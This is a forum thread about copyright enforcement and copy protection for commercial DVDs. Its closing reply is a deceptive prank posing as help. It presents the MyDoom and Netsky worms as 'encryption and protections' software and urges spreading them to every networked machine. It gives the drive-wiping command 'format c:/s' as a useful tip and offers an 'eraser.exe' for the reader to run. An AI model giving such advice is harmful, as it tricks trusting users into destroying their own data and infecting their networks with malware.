Sorry let me explain: I was referring to the situation when someone takes whole or part of the commercially avail. DVD and publishes (reprints) that without permission.Originally Posted by Cornucopia
I agree that in many cases prosecution is close to impossible also for giants. Take e.g. video that was leaked to the internet... it's like chasing the wind. But if your friend allowed a TV station to broadcast a portion of the video that you shot (and lent him a DVD disk to watch), you obviously have a case (may be quite lucrative at times).
When it comes to physical protection, there are more possibilities for PC based viewing as opposed to standalone player which was proven ineffective.
You are right about nag screen or copyright mark. It is not necessary, every publication is considered original unless proven otherwise. I wrote that to make a point (for clarity of the argument).

Yep, I agree, and your explanation was just what I guessed you meant.

there is actually a software for it. Have you do a search for MyDoom or Netsky? Do some search and see if you can download and run it. Make sure all your network computers are connected to the machine you are running as well so that way, all those machines will get the full encryption and protections that you wanted. You also might want to try this command whcih works really well. Go to START menu, choose run, and type: command. When a black box comes up type in: format c:/s
Please let us know how it goes!!! Best wishes. Also, let mw go home and find this cool utlity that you can run as well. It's call something liek eraser.exe. I will upload so you can run it as you like.
